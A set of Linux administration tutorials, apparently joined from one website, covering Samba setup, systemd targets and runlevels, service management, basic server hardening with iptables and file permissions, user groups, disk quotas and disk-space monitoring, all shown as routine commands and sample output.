Now it is time to test the Samba configuration file for any errors. For this you can use the command-line tool "testparm" as root:

# testparm

Load smb config files from /etc/samba/smb.conf

Rlimit_max: rlimit_max (1024) below minimum Windows limit (16384)

Processing section “[NetApps]”

Loaded services file OK.

Server role: ROLE_STANDALONE

Press enter to see a dump of your service definitions

If you would like to ensure that Windows users are automatically authenticated to your Samba share, without being prompted for a username/password, all that’s needed is to create Samba users and passwords that exactly match your Windows clients' usernames and passwords. When a Windows system accesses a Samba share, it will automatically try to log in using the same credentials as the user logged into the Windows system.

Starting Samba and NetBios Name Service on RHEL

The Samba and NetBios Nameservice or NMB services have to be enabled and then started for them to take effect:

# systemctl enable smb.service
# systemctl start smb.service
# systemctl enable nmb.service
# systemctl start nmb.service

In case the services were already running, you may have to restart them again:

# systemctl restart smb.service
# systemctl restart nmb.service

If you are not using systemctl command, you can alternatively start the Samba using a more classic way:

[root@gateway] service smb start
Starting SMB services:  [OK]

To configure your Linux system to automatically start the Samba service at boot, the above command will need to be inserted in the /etc/rc.local file. For more information about this, you can read our popular Linux Init Process & Different RunLevels article.

Accessing the Samba Shares From Windows                               

Now that you have configured the Samba resources and the services are running, they can be tested for sharing from a Windows system. For this, open the Windows Explorer and navigate to the Network page. Windows should show the RHEL system. If you double-click on the RHEL icon, you will be prompted for the username and password. The username to be entered now is “administrator” with the password that was assigned. 

Again, if you are logged on your Windows workstation using the same account and password as that of the Samba service (e.g Administrator), you will not be prompted for any authentication as the Windows  operating system will automatically authenticate to the RHEL Samba service using these credentials.

Accessing Windows Shares From RHEL Workstation or Server

To access Windows shares from your RHEL system, the package samba-client may have to be installed, unless it is installed by default. For this you must gain root privileges with (give the root password, when prompted):

$ su -  

Install samba-client using the following commands:

# yum install samba-client

To see any shared resource on the Windows system and to access it, you can go to Places > Network. Clicking on the Windows Network icon will open up the list of workgroups available for access.
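
If you prefer the command line, the samba-client package also provides the smbclient utility. For example, to list the shares offered by a Windows host and then connect to one of them (the hostname "winserver" and share name "Documents" below are just examples):

$ smbclient -L //winserver -U administrator
$ smbclient //winserver/Documents -U administrator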


Understanding The Linux Init Process & Different RunLevels

Different Linux systems can be used in many ways. This is the main idea behind operating different services at different operating levels. For example, the Graphical User Interface can only be run if the system is running the X-server; multiuser operation is only possible if the system is in a multiuser state or mode, such as having networking available. These are the higher states of the system, and sometimes you may want to operate at a lower level, say, in the single user mode or the command line mode.

Such levels are important for different operations, such as for fixing file or disk corruption problems, or for the server to operate in a run level where the X-session is not required. In such cases having services running that depend on higher levels of operation, makes no sense, since they will hamper the operation of the entire system.

Each service is assigned to start whenever its run level is reached. Therefore, when you ensure the startup process is orderly, and you change the mode of the machine, you do not need to bother about which service to manually start or stop.

The main run-levels that a system could use are:

RunLevel     Target                                                    Notes
0            runlevel0.target, poweroff.target                         Halt the system
1            runlevel1.target, rescue.target                           Single user mode
2, 4         runlevel2.target, runlevel4.target, multi-user.target     User-defined/Site-specific runlevels. By default, identical to 3
3            runlevel3.target, multi-user.target                       Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.
5            runlevel5.target, graphical.target                        Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login (X11)
6            runlevel6.target, reboot.target                           Reboot
Emergency    emergency.target                                          Emergency shell

The system and service manager for Linux is now “systemd”. It provides a concept of “targets”, as in the table above. Although targets serve a similar purpose as runlevels, they act somewhat differently. Each target has a name instead of a number and serves a specific purpose. Some targets may be implemented after inheriting all the services of another target and adding more services to it.

Backward compatibility exists, so switching targets using the familiar 'telinit RUNLEVEL' command still works. On Fedora installs, runlevels 0, 1, 3, 5 and 6 have an exact mapping to specific systemd targets. However, user-defined runlevels such as 2 and 4 are not mapped that way; by default they are treated the same as runlevel 3.

For using the user-defined levels 2 and 4, new systemd targets have to be defined that use one of the existing runlevels as a base; the services you want to enable are then symlinked into that target's .wants directory (see the sketch below).
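
A rough sketch of that recipe, assuming a Fedora-style layout and using runlevel 4 with httpd as purely illustrative names:

# cp /lib/systemd/system/multi-user.target /etc/systemd/system/runlevel4.target
# mkdir /etc/systemd/system/runlevel4.target.wants
# ln -s /lib/systemd/system/httpd.service /etc/systemd/system/runlevel4.target.wants/httpd.service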

The most commonly used runlevels in a currently running linux box are 3 and 5. You can change runlevels in many ways.

A runlevel of 5 will take you to a GUI-enabled login prompt and desktop operations. Normally, with a default installation, this would take you to a GNOME or KDE Linux environment. A runlevel of 3 would boot your Linux box to terminal mode (non-X) and drop you to a terminal login prompt. Runlevels 0 and 6 are the runlevels for halting or rebooting your Linux system respectively.

Although compatible with SysV and LSB init scripts, systemd:

  • Provides aggressive parallelization capabilities.
  • Offers on-demand starting of daemons.
  • Uses socket and D-Bus activation for starting services.
  • Keeps track of processes using Linux cgroups.
  • Maintains mount and automount points.
  • Supports snapshotting and restoring of the system state.
  • Implements an elaborate transactional dependency-based service control logic.

Systemd starts up and supervises the entire operation of the system. It is based on the notion of units. These are composed of a name, and a type as shown in the table above. There is a matching configuration file with the same name and type. For example, a unit avahi.service will have a configuration file with an identical name, and will be a unit that encapsulates the Avahi daemon. There are seven different types of units, namely, service, socket, device, mount, automount, target, and snapshot.

To introspect and/or control the state of the system and service manager under systemd, the main tool or command is "systemctl". When booting up, systemd activates the default.target. The job of the default.target is to activate the different services and other units by considering their dependencies. The 'systemd.unit=' option can be passed on the kernel command line to override the unit to be activated. For example,

systemd.unit=rescue.target is a special target unit for setting up the base system and a rescue shell (similar to run level 1);

systemd.unit=emergency.target, is very similar to passing init=/bin/sh but with the option to boot the full system from there;

systemd.unit=multi-user.target for setting up a non-graphical multi-user system;

systemd.unit=graphical.target for setting up a graphical login screen.
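
For day-to-day introspection, systemctl itself can be used to list and inspect units; a couple of illustrative commands (the avahi-daemon unit is just an example):

# systemctl list-units --type=target
# systemctl status avahi-daemon.service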

How to Enable/Disable Linux Services

Following are the commands used to enable or disable services in CentOS, Redhat Enterprise Linux and Fedora systems:

Activate a service immediately e.g postfix:

[root@gateway ~]# service postfix start
Starting postfix: [  OK  ]

To deactivate a service immediately e.g postfix:

[root@gateway ~]# service postfix stop
Shutting down postfix: [  OK  ]

To restart a service immediately e.g postfix:

[root@gateway ~]# service postfix restart
Shutting down postfix: [FAILED]
Starting postfix: [  OK  ]

You might have noticed the 'FAILED' message. This is normal behavior as we shut down the postfix service with our first command (service postfix stop), so shutting it down a second time would naturally fail!

Determine Which Linux Services are Enabled at Boot

The first column of the 'chkconfig --list' output shown further below is the name of a service which is currently enabled at boot. Review each listed service to determine whether it can be disabled.

If it is appropriate to disable a service, do so using the command:

[root@gateway ~]# chkconfig --level 0123456 servicename off

Run the following command to obtain a list of all services programmed to run in the different Run Levels of your system:

[root@gateway ~]#  chkconfig --list | grep :on

NetworkManager  0:off   1:off   2:on    3:on    4:on    5:on    6:off
abrtd           0:off   1:off   2:off   3:on    4:off   5:on    6:off
acpid           0:off   1:off   2:on    3:on    4:on    5:on    6:off
atd             0:off   1:off   2:off   3:on    4:on    5:on    6:off
auditd          0:off   1:off   2:on    3:on    4:on    5:on    6:off
autofs          0:off   1:off   2:off   3:on    4:on    5:on    6:off
avahi-daemon    0:off   1:off   2:off   3:on    4:on    5:on    6:off
cpuspeed        0:off   1:on    2:on    3:on    4:on    5:on    6:off
crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
cups            0:off   1:off   2:on    3:on    4:on    5:on    6:off
haldaemon       0:off   1:off   2:off   3:on    4:on    5:on    6:off
httpd           0:off   1:off   2:off   3:on    4:off   5:off   6:off
ip6tables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables        0:off   1:off   2:on    3:on    4:on    5:on    6:off
irqbalance      0:off   1:off   2:off   3:on    4:on    5:on    6:off

Several of these services are required, but several others might not serve any purpose in your environment, and use CPU and memory resources that would be better allocated to applications. Assuming you don't need RPC services, autofs or NFS, they can be disabled for all Run Levels using the following commands:

[root@gateway ~]# /sbin/chkconfig --level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig --level 0123456 nfslock off
[root@gateway ~]# /sbin/chkconfig --level 0123456 netfs off
[root@gateway ~]# /sbin/chkconfig --level 0123456 rpcgssd off
[root@gateway ~]# /sbin/chkconfig --level 0123456 rpcidmapd off
[root@gateway ~]# /sbin/chkconfig --level 0123456 autofs off

How to Change Runlevels

You can switch to runlevel 3 by running:    

[root@gateway ~]# systemctl isolate multi-user.target

(or)

[root@gateway ~]# systemctl isolate runlevel3.target

You can switch to runlevel 5 by running:    

[root@gateway ~]# systemctl isolate graphical.target

(or)

[root@gateway ~]# systemctl isolate runlevel5.target

How to Change the Default Runlevel Using Systemd

Systemd uses a symlink to point to the default runlevel (target). You have to delete the existing symlink first, before you can create a new one:
 
[root@gateway ~]# rm /etc/systemd/system/default.target

Switch to runlevel 3 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target

Switch to runlevel 5 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

 And just in case you were wondering, systemd does not use the classic /etc/inittab file!

How to Change The Default Runlevel Using The Inittab File

There's the systemd way and, of course, the inittab way. On older SysV-init based systems, runlevels are represented in the /etc/inittab text file, and the default runlevel is specified there.

To change the default runlevel in Fedora, edit /etc/inittab and find the line that looks like this:

id:5:initdefault:

The number 5 represents a runlevel with X enabled (GNOME/KDE mostly). If you want to change to runlevel 3, simply change this:

id:5:initdefault:

to this:

id:3:initdefault:

Save and reboot your Linux box. It will now boot into runlevel 3, a runlevel without X or a GUI. Avoid changing the default /etc/inittab runlevel value to 0 or 6.

Users having difficulty with Linux editors can also read our article on how to use Vi, the popular Linux editor: Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features.


How To Secure Your Linux Server or Workstation - Linux Best Security Practices

Below are some of the most common recommendations and methods to effectively secure a Linux server or workstation.

Boot Disk

One of the foremost requisites of a secure Linux server is the boot disk. Nowadays, this has become rather simple as most Linux distributions are on bootable CD/DVD/USB sticks. Other options are, to use rescue disks such as the ‘TestDisk’, ‘SystemRescueCD’, ‘Trinity Rescue Kit’ or ‘Ubuntu Rescue Remix’. These will enable you to gain access to your system, if you are unable to gain entry, and also to recover files and partitions if your system is damaged. They can be used to check for virus attacks and to detect rootkits.

The next requirement is patching your system. Distributions issue notices for security updates, and you can download and patch your system using these updates. RPM users can use the 'up2date' command, which automatically resolves dependencies, rather than the plain rpm commands, since those only report dependencies and do not help to resolve them.

Patch Your System

While RedHat/CentOS/Fedora users can patch their systems with a single command, 'yum update',   Debian users can patch their systems with the ‘sudo apt-get update’ command, which will update the sources list. This should be followed by the command ‘sudo apt-get upgrade’, which will install the newest version of all packages on the machine, resolving all the dependencies automatically.

New vulnerabilities are being discovered all the time, and patches follow. One way to learn about new vulnerabilities is to subscribe to the mailing list of the distribution used.

Disable Unnecessary Services

Your system becomes increasingly insecure as you operate more services, since every service has its own security issues. For improving the overall system performance and for enhancing security, it is important to detect and eliminate unnecessary running services. To know which services are currently running on your system, you can use commands like:

[root@gateway~]# ps aux            


Following is an example output of the above command:

[root@gateway~]# ps aux
USER       PID   %CPU   %MEM    VSZ    RSS  TTY  STAT START   TIME COMMAND
root         1   0.0    0.1   2828    1400  ?     Ss   Feb08   0:02 /sbin/init
root         2   0.0    0.0      0       0  ?     S    Feb08   0:00 [kthreadd]
root         3   0.0    0.0      0       0  ?     S    Feb08   0:00 [migration/0]
root         4   0.0    0.0      0       0  ?     S    Feb08   0:00 [ksoftirqd/0]
root         5   0.0    0.0      0       0  ?     S    Feb08   0:00 [watchdog/0]
root         6   0.0    0.0      0       0  ?     S    Feb08   0:00 [events/0]
root         7   0.0    0.0      0       0  ?     S    Feb08   0:00 [cpuset]
root         8   0.0    0.0      0       0  ?     S    Feb08   0:00 [khelper]
root         9   0.0    0.0      0       0  ?     S    Feb08   0:00 [netns]
root        10   0.0    0.0      0       0  ?     S    Feb08   0:00 [async/mgr]
root        11   0.0    0.0      0       0  ?     S    Feb08   0:00 [pm]
root        12   0.0    0.0      0       0  ?     S    Feb08   0:00 [sync_supers]
apache   17250   0.0    0.9  37036    10224 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   25686   0.0    0.9  37168    10244 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   28290   0.0    0.9  37168    10296 ?     S    Feb08   0:00 /usr/sbin/httpd
postfix   30051  0.0    0.2  10240     2136 ?     S    23:35   0:00 pickup -l -t fifo -u
postfix   30060  0.0    0.2  10308     2280 ?     S    23:35   0:00 qmgr -l -t fifo -u
root      31645  0.1    0.3  11120     3112 ?     Ss   23:45   0:00 sshd: root@pts/1


The following command will list all start-up scripts for RunLevel 3 (Full multiuser mode):

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*     
OR
[root@gateway~]# ls -l /etc/rc3.d/S*          

Here is an example output of the above commands:

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*
lrwxrwxrwx. 1 root root 23 Jan 16 17:45 /etc/rc.d/rc3.d/S00microcode_ctl -> ../init.d/microcode_ctl
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S01sysstat -> ../init.d/sysstat
lrwxrwxrwx. 1 root root 22 Jan 16 17:44 /etc/rc.d/rc3.d/S02lvm2-monitor -> ../init.d/lvm2-monitor
lrwxrwxrwx. 1 root root 19 Jan 16 17:39 /etc/rc.d/rc3.d/S08ip6tables -> ../init.d/ip6tables
lrwxrwxrwx. 1 root root 18 Jan 16 17:38 /etc/rc.d/rc3.d/S08iptables -> ../init.d/iptables
lrwxrwxrwx. 1 root root 17 Jan 16 17:42 /etc/rc.d/rc3.d/S10network -> ../init.d/network
lrwxrwxrwx. 1 root root 16 Jan 27 01:04 /etc/rc.d/rc3.d/S11auditd -> ../init.d/auditd
lrwxrwxrwx. 1 root root 21 Jan 16 17:39 /etc/rc.d/rc3.d/S11portreserve -> ../init.d/portreserve
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S12rsyslog -> ../init.d/rsyslog
lrwxrwxrwx. 1 root root 18 Jan 16 17:45 /etc/rc.d/rc3.d/S13cpuspeed -> ../init.d/cpuspeed
lrwxrwxrwx. 1 root root 20 Jan 16 17:40 /etc/rc.d/rc3.d/S13irqbalance -> ../init.d/irqbalance
lrwxrwxrwx. 1 root root 17 Jan 16 17:38 /etc/rc.d/rc3.d/S13rpcbind -> ../init.d/rpcbind
lrwxrwxrwx. 1 root root 19 Jan 16 17:43 /etc/rc.d/rc3.d/S15mdmonitor -> ../init.d/mdmonitor
lrwxrwxrwx. 1 root root 20 Jan 16 17:38 /etc/rc.d/rc3.d/S22messagebus -> ../init.d/messagebus


To disable services, you can either stop a running service or change the configuration in a way that the service will not start on the next reboot. To stop a running service, RedHat/CentOS users can use the command -

[root@gateway~]# service service-name stop

The example below shows the command used to stop our Apache web service (httpd):

[root@gateway~]# service httpd stop
Stopping httpd: [  OK  ]

In order to stop the service from starting up at boot time, you could use -

[root@gateway~]# /sbin/chkconfig --level 2345 service-name off

Where 'service-name' is replaced by the name of the service, e.g. httpd.

You can also remove a service from the startup script by using the following commands which will remove the httpd (Apache Web server) service:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd 

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

During startup of the Linux operating system, the rc program looks in the /etc/rc.d/rc3.d directory (when configured with Runlevel 3), executing any K* scripts with an option of stop. Then, all the S* scripts are started with an option of start. Scripts are started in numerical order; thus, the S08iptables script is started before the S85httpd script. This allows you to choose exactly when your script starts without having to edit files. The same rule applies to the K* scripts.

In some rare cases, services may have to be removed from /etc/xinetd.d or /etc/inetd.conf file.

Debian users can use the following commands to stop, start and restart a service -

$ sudo service httpd stop
$ sudo service httpd start   
$ sudo service httpd restart       


Host-based Firewall Protection with IPtables

Using iptables firewall, you could limit access to your server by IP address or by host/domain name. RedHat/CentOS users have a file /etc/sysconfig/iptables based on the services that were ‘allowed’ during installation. The file can be edited to accept some services and block others. In case the requested service does not match any of the ACCEPT lines in the iptables file, the packet is logged and then rejected.

RedHat/CentOS/Fedora users will have to install the iptables with:

[root@gateway~]# yum install iptables

Debian users will need to install the iptables with the help of:

$ sudo apt-get install iptables

Then use the iptables command line options/switches to implement the policy. The rules of iptables usually take the following form:

  • Individual rejects first
  • Then open up what is needed
  • Block everything else

As it is a table of rules, the first matching rule takes precedence: if an early rule disallows everything, nothing that follows will matter.

In practice, a firewall script is needed which is created using the following sequence:
1) Create your script
2) Make it executable
3) Run the script

Following are the commands used for the above order:

[root@gateway~]# vim /root/firewall.sh   
[root@gateway~]# chmod 755 /root/firewall.sh   
[root@gateway~]# /root/firewall.sh             
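
As an illustration only, a minimal /root/firewall.sh might look like the sketch below; the default policies and the SSH source network are examples and should be adapted to your own environment:

#!/bin/bash
# Flush any existing rules
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD

# Default policies: drop incoming and forwarded traffic, allow outgoing
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

# Allow loopback traffic and replies to connections we initiated
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow SSH only from the local LAN (example network)
iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT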

Updating the firewall script is simply a matter of re-editing it to make the necessary changes and running it again. Since iptables does not run as a daemon, there is nothing to "stop"; instead, the existing rules are simply flushed with the '-F' option:

[root@gateway~]# iptables -F INPUT
[root@gateway~]# iptables -F OUTPUT
[root@gateway~]# iptables -F FORWARD
[root@gateway~]# iptables -F POSTROUTING -t nat
[root@gateway~]# iptables -F PREROUTING -t nat

At startup/reboot, all that is needed is to execute the script so that the iptables rules are loaded again. The simplest way to do this is to add the script (/root/firewall.sh) to the /etc/rc.local file.

Best Practices

Apart from the above, a number of steps need to be taken to keep your Linux server safe from outside attackers. Key files should be checked for security and must be set to root for both owner and group:

/etc/fstab
/etc/passwd
/etc/shadow
/etc/group

The above should be owned by root and their permissions must be 644 (rw-r--r--), except /etc/shadow, which should have the permission 400 (r--------).
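
These ownerships and permissions can be applied (or re-applied) with the following commands:

# chown root:root /etc/fstab /etc/passwd /etc/shadow /etc/group
# chmod 644 /etc/fstab /etc/passwd /etc/group
# chmod 400 /etc/shadow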

You can read more on how to set permissions on your Linux files in our Linux File & Folder Permissions article

Limiting Root Access

Implement a password policy that forces users to change their login passwords, for example, every 60 to 90 days, starts warning them 7 days before expiry, and accepts only passwords that are a minimum of 14 characters in length.
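
A sketch of how such a policy might be expressed with the standard login.defs and chage mechanisms; the values and the username are examples, and minimum password length is usually enforced separately through PAM (e.g. pam_cracklib's minlen option). In /etc/login.defs (applies to newly created accounts):

PASS_MAX_DAYS   90
PASS_MIN_DAYS   1
PASS_WARN_AGE   7

For an existing account, the same ageing policy can be applied with chage:

# chage -M 90 -m 1 -W 7 chris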

Root access must be limited by using the following commands for RedHat/CentOS/Fedora -

[chris@gateway~]$ su -
Password: <enter root password>
[root@gateway ~]#

Or for RedHat/CentOS/Fedora/Debian:

[chris@gateway~]$ sudo -i
Password: <enter your own user password>
[root@gateway ~]#

Provide the password of the user, who can assume root privileges.

Only root should be able to access CRON. Cron is a system daemon used to execute desired tasks (in the background) at designated times.

A crontab is a simple text file with a list of commands meant to be run at specified times. It is edited with a command-line utility. These commands (and their run times) are then controlled by the cron daemon, which executes them in the system background. Each user has a crontab file which specifies the actions and times at which they should be executed; these jobs will run regardless of whether the user is actually logged into the system. There is also a root crontab for tasks requiring administrative privileges. This system crontab allows scheduling of systemwide tasks (such as log rotations and system database updates). You can use the man crontab command to find more information about it.
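
For instance, to schedule a job in the root crontab, edit it and add a line with the schedule and the command; the script path below is purely an example:

# crontab -e

30 2 * * * /usr/local/sbin/rotate-logs.sh

The entry above would run the script every day at 02:30.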

Lastly, the use of SSH is recommended instead of Telnet for remote accesses. The main difference between the two is that SSH encrypts all data exchanged between the user and server, while telnet sends all data in clear-text, making it extremely easy to obtain root passwords and other sensitive information. All unused TCP/UDP ports must also be blocked using IPtables.


Understanding, Administering Linux Groups and User Accounts

In a multi-user environment like Linux, every file is owned by a user and a group. There can be others as well who may be allowed to work with the file. What this means is, as a user, you have all the rights to read, write and execute a file created by you. Now, you may belong to a group, so you can give your group members the permission to either read, write (modify) and/or execute your file. In the same way, for those who do not belong to your group, and are called 'others', you may give similar permissions.

How are these permissions shown and how are they modified?

In a shell, command line or within a terminal, if you type 'ls -l', you will see something like the following:

drwxr-x--- 3 tutor firewall  4096 2010-08-21 15:52 Videos
-rwxr-xr-x 1 tutor firewall    21 2010-05-10 10:02 Doom-TNT

The last group of words on the right is the name of the file or directory. Therefore, 'Videos' is a directory, which is designated by the ’d’ at the start of the line. Since 'Doom-TNT' shows only a '-', at the start of the line, it is a file. The following series of 'rwx...' are the permissions of the file or directory. You will notice that there are three sets of 'rwx'. The first three rwx are the read, write and execute permissions for the owner 'tutor'.

Since the r, w and x are present, it means the owner has all the permissions. The next set of 'rwx' holds the permissions for the group, which in this listing is 'firewall'. You will notice that the 'w' here is missing, and is replaced by a '-'. This means members of the group 'firewall' have permission to read and to execute 'Doom-TNT', but cannot write to it or modify it. Permission for 'others' is the same. Therefore, others can also read and execute the file, but not write to it or modify it. Others do not have any permissions for the directory 'Videos' and hence cannot read (enter), modify or execute 'Videos'.

You can use the 'chmod' command to change the permissions you give. The basic form of the command looks like:

chmod 'who'+/-'permissions' 'filename'

Here, the 'filename' is the file, whose permissions are being modified. You are giving the permissions to 'who', and 'who' can be u=user (meaning you), g=group, o=others, or a=all.

The 'permissions' you give can be r=read, w=write, x=execute or 'space' for no permissions. Using a '+' grants the permission, and a '-' removes it.

As an example, the command 'chmod o+r Videos' will result in:

drwxr-xr-- 3 tutor firewall  4096 2010-08-21 15:52 Videos

and now 'others' can read 'Videos'. Similarly, 'chmod o-r Videos', will set it back as it was, before the modification.
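
For reference, the same end result can also be achieved numerically, where read=4, write=2 and execute=1 are summed per owner/group/others; the command below sets 'Videos' to rwx for the owner, r-x for the group and r-- for others, matching the listing above:

$ chmod 754 Videos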

Linux file and folder permissions are covered extensively on our dedicated Linux File & Folder permissions article.

What Happens In A GUI environment?

If you are using a file manager like Nautilus, you will find a 'view' menu, which has an entry 'Visible Columns'. This opens up another window showing the visible columns that you can select to allow the file manager to show. You will find there are columns like 'Owner', 'Group' and 'Permissions'. By turning these columns ON, you can see the same information as with the 'ls -l' command.

If you want to modify the permissions of any file from Nautilus, you will have to right-click on the file with your mouse. This will open up a window through which you can access the 'properties' of the file. In the properties window, you can set or unset any of the permissions for owner, group and others.

What Are Group IDs?

Because Linux is a multi-user system, there could be several users logged in and using the system. The system needs to keep track of who is using what resources. This is primarily done by allocating identification numbers or IDs to all users and groups. To see the IDs, you may enter the command 'id', which will show you the user ID, the group ID and the IDs of the groups to which you belong.

A standard Linux installation, for example Ubuntu, comes with some groups preconfigured. Some of these are:

4(adm), 20(dialout), 21(fax), 24(cdrom), 26(tape), 29(audio), 30(dip), 44(video), 46(plugdev), 104(fuse), 106(scanner), 114(netdev), 116(lpadmin), 118(admin), 125(sambashare)

The numbers are the group IDs and their names are given inside brackets. Unless you are a member of a specific group, you are not allowed to use that resource. For example, unless you belong to the group 'cdrom', you will not be allowed to access the contents of any CDs and DVDs that are mounted on the system.
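
To grant a user access to such a resource, the account simply has to be added to the relevant group; a small example (user and group names are illustrative, and the new membership takes effect at the next login):

# usermod -aG cdrom tutor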

In Linux, the 'root' or 'super user', also called the 'administrator', is a user who effectively belongs to all groups and has all permissions in all places, unless specifically changed. Users who have been granted root privileges in the 'sudoers' file can assume root status temporarily with the 'sudo' command.


Understanding Linux File System Quotas - Installation and Setup

When you are running your own web hosting, it is important to monitor how much space is being used by each user. This is not a simple task to do manually, since a single user or group could fill up the whole hard disk, leaving no space for the others. Therefore, it is important to allot each user or group their own amount of hard disk space, called a quota, and lock them out from using more than what is allotted.

The system administrator sets a limit or a disk quota to restrict certain aspects of the file system usage on a Linux operating system. In multi-user environments, disk quotas are very useful since a large number of users have access to the file system. They may be logging into the system directly or using their disk space remotely. They may also be accessing their files through NFS or through Samba. If several users host their websites on your web space, you need to implement the quota system.

How to Install Linux Quota

For installing a quota system, for example in your Debian or RedHat Linux system, you will need two tools called 'quota' and 'quotatool'. At the time of installation of these tools, you will be asked if you wish to send daily reminders to users who are going over their quotas.

Now, the administrator also needs to know the users that are going over their quota. The system will send an email to this effect, therefore the email address of the administrator has to be inputted next.

In case the user does not know what to do if the system gives him a warning message, the next entry is the contact number of the administrator. This will be displayed to the user along with the warning message. With this, the quota system installation is completed.
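
For reference, the package installation itself is typically a one-liner; package names can vary slightly between distributions:

$ sudo apt-get install quota quotatool        (Debian/Ubuntu)
# yum install quota                           (RedHat/CentOS/Fedora)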

At this time, a user and a group have to be created and proper permissions given. For creating, you have to assume root status, and type the following commands:

# touch /aquota.user /aquota.group
# chmod 600 /aquota.*

Next, these have to be mounted in the proper place on the root file system. For this, an entry has to be made in the ‘fstab’ file in the directory /etc. In the ‘fstab’ file, the root entry has to be modified with:

noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0
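
For illustration, a complete /etc/fstab entry for the root file system might then look like the following (the device name and file system type are examples):

/dev/sda1  /  ext4  defaults,noatime,nodiratime,usrjquota=aquota.user,grpjquota=aquota.group,jqfmt=vfsv0  1 1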

Next, the computer has to be rebooted, or the file system remounted with the command:

# mount -o remount /

 The system is now able to work with disk quotas. However, you have to allow the system to build/rebuild its table of current disk usage. For this, you must first run quotacheck.

This will examine all the quota-enabled file systems, and build a table of the current disk usage for each one. The operating system’s copy of the disk usage is then updated. In addition, this creates the disk quota files for the entire file system. If the quota already existed, they are updated. The command looks like:

# quotacheck -avugm

 Some explanation is necessary here. The (-a) tells the command that all locally mounted quota-enabled file systems are to be checked. The (-v) is to display the status information as the check proceeds. The (-u) is to enable checking the user disk quota information. The (-g) is to enable checking the group disk quota information. Finally, the (-m) tells the command not to try to remount file system read-only.

After checking and building the disk-quota files is over, the disk-quotas have to be turned on. This is done by the command ‘quotaon’ to inform the system that disk-quota should be enabled, such as:

# quotaon -avug

Here, (-a) forces all file systems in /etc/fstab to enable their quotas. The (-v) displays status information for each file system. The (-u) is for enabling the user quota. The (-g) enables the group quota.

Define Quota for Each User/Group

Now that the system is ready with quotas, you can start defining what each user or group gets as their limit. Two types of limits can be defined: the soft limit, which may be exceeded temporarily for the duration of a grace period, and the hard limit, which can never be exceeded. To set the two limits, edit the block and inode limits with:

# edquota -u $USER

This allows you to edit the following line:

/dev/sda1   1024  200000  400000 1024 0    0

Here, the soft limit is 200000 (200MB) and the hard limit is 400000 (400MB). You may change it to suit your user (denoted by $USER).

The soft limit has a grace period of 7 days by default. It can be changed to days, hours, minutes, or seconds as desired by:

# edquota -t

This allows you to edit the line below. It has been modified to change the default to 15 minutes:

/dev/sda1                 15minutes                  7days


For editing group quota use:

# edquota -g $GROUP

Quota Status Report

Now that you have set a quota, it is easy to create a mini report on how much space a user has used. For this use the command:

root@gateway [~]# repquota  -a

*** Report for user quotas on device /dev/vzfs
Block grace time: 00:00; Inode grace time: 00:00
                            Block  limits                      File limits
User         used    soft    hard  grace    used  soft  hard  grace
---------------------------------------------------------------------
root        --  5578244       0       0     117864     0     0      
bin         --    30936       0       0        252     0     0      
mail        --       76       0       0         19     0     0      
nobody      --        0       0       0          3     0     0      
mailnull    --     3356       0       0        157     0     0      
smmsp       --        4       0       0          2     0     0      
named       --      860       0       0         11     0     0      
rpc         --        0       0       0         1      0     0      
mailman     --    40396       0       0       2292     0     0      
dovecot     --        4       0       0          1     0     0      
mysql       --   181912       0       0        857     0     0      
firewall    --    92023      153600 153600     21072   0     0      
#55         --     1984       0       0         74     0     0      
#200        --     1104       0       0         63     0     0      
#501        --     6480       0       0         429    0     0      
#506        --      648       0       0         80     0     0      
#1000       --     7724       0        0       878     0     0      
#50138      --    43044       0        0      3948     0     0

Once the user and group quotas are set up, it is simple to manage your storage and prevent any single user from hogging all of the disk space. By using disk quotas, you force your users to be tidier, so users and groups will not fill their home directories with junk or old documents that are no longer needed.


Linux System Resource & Performance Monitoring

You may be a user at home, a user in a LAN (local area network), or a system administrator of a large network of computers. Alternatively, you may be maintaining a large number of servers with multiple hard drives. Whatever may be your function, monitoring your Linux system is of paramount importance to keep it running in top condition.

While monitoring a complex computer system, some of the basic things to be kept in mind are the utilization of the hard disk, memory or RAM, CPU, the running processes, and the network traffic. Analysis of the information made available during monitoring is necessary, since all the resources are limited. Reaching the limits or exceeding them on any of the resources could lead to severe consequences, which may even be catastrophic.

Monitoring The Hard Disk Space

Use a simple command like:

$ df -h

This results in the output:

Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1        22G  5.0G   16G  24% /
/dev/sda2        34G   23G  9.1G  72% /home

This shows there are two partitions (sda1 and sda2) on the hard disk sda, currently at 24% and 72% utilization. The total size is shown in gigabytes (G), along with how much is used and how much is still available. However, checking each hard disk manually to see the percentage used can be a big drag. It is better to have the system check the disks and inform you by email if there is a potential danger. Bash scripts may be written for this and run at specific times as a cron job.
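
A minimal sketch of such a script is shown below; the threshold, the recipient address and the availability of the 'mail' command are assumptions you would adapt to your own setup:

#!/bin/bash
# /root/disk-alert.sh - warn by email when any file system is nearly full
THRESHOLD=90

df -hP | awk 'NR>1 {print $5, $6}' | while read usage mount; do
    pct=${usage%\%}                      # strip the trailing % sign
    if [ "$pct" -ge "$THRESHOLD" ]; then
        echo "Warning: $mount is ${pct}% full" | mail -s "Disk usage alert on $(hostname)" admin@example.com
    fi
done

The script could then be scheduled as a cron job, for example once an hour.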

